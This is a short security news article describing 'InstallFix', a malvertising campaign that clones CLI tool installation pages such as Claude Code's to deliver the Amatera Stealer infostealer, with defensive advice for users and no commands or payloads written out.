Cybersecurity researchers have discovered a new social engineering attack called InstallFix that tricks users into running malicious commands while pretending to install legitimate command-line tools.
The attack is a variation of the ClickFix technique and targets developers and users who often install software using quick command-line instructions copied from the internet.
Researchers from Push Security found that attackers create fake installation pages for popular command-line interface tools. These pages closely copy the design, branding, and documentation layout of the real websites, making them difficult to distinguish from the legitimate versions.
One example highlighted in the report involved a cloned installation page for Claude Code, a CLI coding assistant developed by Anthropic. The fake page looked almost identical to the real documentation site, including its layout and sidebar links.
However, the installation commands for macOS and Windows were modified to run malicious scripts instead of the real software installer. When users copy and execute those commands in their terminal, malware is silently downloaded from attacker-controlled servers.
The attack takes advantage of a common developer habit known as “curl to bash,” where users download and run scripts directly from the internet using a single command without reviewing the code.
According to the researchers, the fake sites are promoted through malicious advertising campaigns on Google Search. When users search for phrases like “Claude Code install” or “Claude Code CLI,” sponsored results may lead them to the malicious clone instead of the official website.
Investigations by BleepingComputer confirmed that some of these fake pages are still appearing in sponsored search results. One example used a Squarespace-hosted website that perfectly mirrored the official Claude Code documentation.
The malware delivered in these attacks is known as Amatera Stealer, a data-stealing program designed to extract sensitive information from infected systems. It can target browser passwords, session tokens, cookies, cryptocurrency wallets, and other stored credentials.
On macOS systems, the malicious command uses encoded instructions to download and run a hidden binary file from an attacker-controlled domain. For Windows systems, the attack uses the built-in utility mshta.exe to retrieve the malware and launch additional processes that help execute the payload.
Security researchers believe Amatera Stealer is based on another malware family called ACR Stealer and is distributed as a malware-as-a-service platform that cybercriminals can subscribe to.
The campaign is also difficult to detect because the malicious sites are often hosted on legitimate platforms such as Cloudflare Pages, Squarespace, and Tencent EdgeOne.
Researchers warn that as more non-technical users begin working with developer-style tools, attacks like InstallFix could become more common.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Users are advised to avoid clicking sponsored search results when downloading developer tools, verify installation instructions on official websites, and bookmark trusted download pages to prevent falling for fake installation guides.
